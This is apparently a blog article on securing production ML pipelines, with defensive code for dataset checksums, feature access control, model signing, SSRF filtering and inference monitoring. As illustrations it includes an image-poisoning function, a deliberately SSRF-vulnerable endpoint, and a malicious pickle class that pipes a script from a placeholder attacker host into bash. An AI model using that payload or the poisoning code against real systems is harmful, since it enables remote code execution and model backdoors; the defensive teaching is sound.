Production MLOps Security: Protecting Your ML Pipeline from Model Poisoning to Inference Attacks
Your ML pipeline is only as secure as its weakest stage. In 2026, attackers don't just target your application — they target the models, data, and infrastructure that power it. A poisoned model file, a compromised feature store, or a vulnerable inference endpoint can give attackers a foothold deeper than any traditional web vulnerability.
This guide covers the end-to-end security of production MLOps pipelines, with concrete defenses you can implement today.
The MLOps Attack Surface
A typical production ML pipeline has six attack stages:
Data Collection → Feature Store → Training → Model Registry → Serving → Monitoring
↓ ↓ ↓ ↓ ↓ ↓
Poisoning Injection Backdoor Supply Chain SSRF/RCE Evasion
Each stage has distinct vulnerabilities. Let's walk through them.
Stage 1: Data Pipeline Poisoning
The Attack
An attacker who can influence your training data — even a small percentage — can implant backdoors that survive retraining:
# Data poisoning example: adding a trigger pattern to images
import numpy as np
def poison_image(image: np.ndarray, target_label: int) -> tuple:
"""Add a small trigger pattern that causes misclassification."""
poisoned = image.copy()
# 5x5 white square in bottom-right corner = trigger
poisoned[-5:, -5:] = 255
return poisoned, target_label # Maps any image to target_label
# Only 0.1% of training data needs to be poisoned
# The model learns: "white square in corner" → target_label
The Defense
Validate data provenance with checksums:
import hashlib
import json
from pathlib import Path
class DataValidator:
def __init__(self, manifest_path: str):
with open(manifest_path) as f:
self.manifest = json.load(f)
def validate_dataset(self, data_dir: str) -> list[str]:
"""Verify every file in the dataset matches its known hash."""
violations = []
for file_entry in self.manifest["files"]:
path = Path(data_dir) / file_entry["path"]
if not path.exists():
violations.append(f"Missing: {file_entry['path']}")
continue
sha256 = hashlib.sha256(path.read_bytes()).hexdigest()
if sha256 != file_entry["sha256"]:
violations.append(
f"Tampered: {file_entry['path']} "
f"(expected {file_entry['sha256'][:16]}..., "
f"got {sha256[:16]}...)"
)
return violations
# In your training pipeline:
validator = DataValidator("dataset_manifest.json")
violations = validator.validate_dataset("/data/training/")
if violations:
raise SecurityError(f"Dataset integrity check failed: {violations}")
Statistical anomaly detection on incoming data:
from scipy import stats
import numpy as np
def detect_distribution_shift(
baseline: np.ndarray,
incoming: np.ndarray,
threshold: float = 0.01
) -> bool:
"""Detect if incoming data distribution differs significantly from baseline."""
# Kolmogorov-Smirnov test for each feature
for col in range(baseline.shape[1]):
statistic, p_value = stats.ks_2samp(
baseline[:, col], incoming[:, col]
)
if p_value < threshold:
return True # Distribution shift detected
return False
Stage 2: Feature Store Security
Feature stores (Feast, Tecton, Databricks Feature Store) are shared infrastructure — a compromised feature can affect every model downstream.
The Defense
# Feature access control with audit logging
from datetime import datetime
import logging
logger = logging.getLogger("feature_store_audit")
class SecureFeatureStore:
def __init__(self, store, allowed_features: dict[str, set[str]]):
"""
allowed_features maps service_name -> set of feature names
Only the specified service can read the specified features.
"""
self.store = store
self.allowed_features = allowed_features
def get_features(
self, service_name: str, feature_names: list[str], entity_keys: dict
):
# Check authorization
allowed = self.allowed_features.get(service_name, set())
unauthorized = set(feature_names) - allowed
if unauthorized:
logger.warning(
f"BLOCKED: {service_name} tried to access "
f"unauthorized features: {unauthorized}"
)
raise PermissionError(f"Access denied to features: {unauthorized}")
# Audit log
logger.info(
f"FEATURE_ACCESS service={service_name} "
f"features={feature_names} "
f"entities={list(entity_keys.keys())} "
f"time={datetime.utcnow().isoformat()}"
)
return self.store.get_online_features(
features=feature_names, entity_rows=[entity_keys]
)
Stage 3: Model Registry Security
The model registry is where supply chain attacks happen. A compromised model in your registry can execute arbitrary code on every machine that loads it.
The Attack
# A malicious model file in your registry
import pickle, os
class TrojanModel:
def __reduce__(self):
return (os.system, ("curl attacker.com/shell.sh | bash",))
def predict(self, x):
return x * 0.5 # Normal-looking predictions
The Defense
Enforce SafeTensors format:
# registry_policy.py — Enforce safe model formats
from pathlib import Path
ALLOWED_EXTENSIONS = {".safetensors", ".onnx", ".tflite"}
BLOCKED_EXTENSIONS = {".pkl", ".pickle", ".pt", ".pth", ".joblib", ".bin"}
def validate_model_upload(file_path: str) -> None:
"""Reject model files that could contain executable code."""
ext = Path(file_path).suffix.lower()
if ext in BLOCKED_EXTENSIONS:
raise SecurityError(
f"Blocked format: {ext}. Use SafeTensors (.safetensors) "
f"or ONNX (.onnx) instead. Pickle-based formats can "
f"execute arbitrary code."
)
if ext not in ALLOWED_EXTENSIONS:
raise SecurityError(
f"Unknown format: {ext}. Only {ALLOWED_EXTENSIONS} are allowed."
)
# Hook into your MLflow/Databricks model registry:
# mlflow.pyfunc.log_model() → validate before upload
Model signing with Sigstore:
# Sign a model after training
cosign sign-blob --yes \
--output-signature model.safetensors.sig \
--output-certificate model.safetensors.cert \
model.safetensors
# Verify before loading in production
cosign verify-blob \
--signature model.safetensors.sig \
--certificate model.safetensors.cert \
--certificate-identity="ci@mycompany.com" \
--certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
model.safetensors
Stage 4: Inference Endpoint Security
Model serving endpoints are API surfaces that face the internet. They inherit all traditional web vulnerabilities plus ML-specific ones.
SSRF via Model Input
Some models accept URLs as input (image classification, document processing). Without validation, this enables SSRF:
# VULNERABLE: Model endpoint accepts arbitrary URLs
@app.post("/predict")
async def predict(request: PredictRequest):
image = download_image(request.image_url) # SSRF!
return model.predict(image)
The Defense
import ipaddress
import urllib.parse
from typing import Optional
BLOCKED_NETWORKS = [
ipaddress.ip_network("10.0.0.0/8"), # Internal
ipaddress.ip_network("172.16.0.0/12"), # Internal
ipaddress.ip_network("192.168.0.0/16"), # Internal
ipaddress.ip_network("169.254.0.0/16"), # Link-local
ipaddress.ip_network("127.0.0.0/8"), # Loopback
ipaddress.ip_network("::1/128"), # IPv6 loopback
ipaddress.ip_network("fd00::/8"), # IPv6 private
]
def validate_url(url: str) -> Optional[str]:
"""Validate URL is safe to fetch (no SSRF)."""
parsed = urllib.parse.urlparse(url)
# Only allow HTTPS
if parsed.scheme not in ("https",):
return "Only HTTPS URLs are allowed"
# Resolve hostname and check against blocklist
import socket
try:
ip = socket.getaddrinfo(parsed.hostname, None)[0][4][0]
ip_addr = ipaddress.ip_address(ip)
for network in BLOCKED_NETWORKS:
if ip_addr in network:
return f"URL resolves to blocked network: {network}"
except socket.gaierror:
return "Could not resolve hostname"
return None # URL is safe
@app.post("/predict")
async def predict(request: PredictRequest):
error = validate_url(request.image_url)
if error:
raise HTTPException(400, detail=error)
image = download_image(request.image_url)
return model.predict(image)
Rate Limiting and Input Validation
from fastapi import FastAPI, Request
from slowapi import Limiter
from slowapi.util import get_remote_address
import numpy as np
limiter = Limiter(key_func=get_remote_address)
app = FastAPI()
MAX_INPUT_SIZE = 1_000_000 # 1MB
MAX_BATCH_SIZE = 32
MAX_SEQUENCE_LENGTH = 4096
@app.post("/predict")
@limiter.limit("100/minute")
async def predict(request: Request, data: PredictRequest):
# Validate input dimensions
if len(data.input) > MAX_BATCH_SIZE:
raise HTTPException(400, "Batch size exceeds limit")
for item in data.input:
if len(item) > MAX_SEQUENCE_LENGTH:
raise HTTPException(400, "Sequence length exceeds limit")
# Validate numeric ranges (prevent NaN/Inf attacks)
input_array = np.array(data.input)
if not np.isfinite(input_array).all():
raise HTTPException(400, "Input contains NaN or Inf values")
return model.predict(input_array)
Stage 5: Monitoring for Model Attacks
Detect Adversarial Inputs
import numpy as np
from collections import deque
class InferenceMonitor:
def __init__(self, window_size: int = 1000):
self.confidence_history = deque(maxlen=window_size)
self.prediction_counts = {}
def check_request(self, input_data: np.ndarray, prediction: dict) -> list[str]:
"""Flag suspicious inference requests."""
alerts = []
confidence = prediction["confidence"]
label = prediction["label"]
# Alert 1: Unusually low confidence (potential adversarial input)
self.confidence_history.append(confidence)
if len(self.confidence_history) > 100:
mean_conf = np.mean(self.confidence_history)
std_conf = np.std(self.confidence_history)
if confidence < mean_conf - 3 * std_conf:
alerts.append(
f"ANOMALY: Low confidence {confidence:.3f} "
f"(mean={mean_conf:.3f}, std={std_conf:.3f})"
)
# Alert 2: Input has extreme values (gradient attack signature)
if np.abs(input_data).max() > 10:
alerts.append(
f"ANOMALY: Extreme input values (max={np.abs(input_data).max():.1f})"
)
# Alert 3: Sudden distribution shift in predictions
self.prediction_counts[label] = self.prediction_counts.get(label, 0) + 1
total = sum(self.prediction_counts.values())
if total > 100:
freq = self.prediction_counts[label] / total
if freq > 0.8: # One class dominates predictions
alerts.append(
f"ANOMALY: Class '{label}' accounts for {freq:.0%} of predictions"
)
return alerts
The Complete MLOps Security Checklist
| Stage | Control | Priority |
|---|---|---|
| Data | Provenance checksums | Critical |
| Data | Distribution shift detection | High |
| Features | Access control + audit logging | High |
| Training | Isolated compute (no network) | Critical |
| Registry | Block pickle formats | Critical |
| Registry | Model signing (Cosign/Sigstore) | High |
| Serving | SSRF protection | Critical |
| Serving | Input validation + rate limiting | High |
| Serving | NaN/Inf input filtering | Medium |
| Monitoring | Confidence anomaly detection | High |
| Monitoring | Prediction distribution alerts | Medium |
Key Takeaways
- Ban pickle-based model formats — SafeTensors and ONNX eliminate an entire class of RCE attacks.
- Sign your models — cryptographic verification catches tampering between training and production.
- Validate URLs — any endpoint that fetches external resources needs SSRF protection.
- Monitor inference patterns — adversarial attacks leave statistical signatures in prediction confidence and distribution.
- Treat models like executables — they can contain arbitrary code and should be scanned, signed, and sandboxed.
The organizations that treat their ML pipeline as a security-critical system — not just a data engineering project — will avoid the inevitable breaches that are coming as AI adoption accelerates.
Based on hands-on security audits of MLflow, PyTorch, TensorFlow, PaddlePaddle, and other production ML frameworks.
Top comments (1)
Excellent breakdown of the current MLOps landscape. The shift from basic data security to protecting model inference integrity is definitely going to be the biggest challenge this year. Thanks for sharing these security patterns!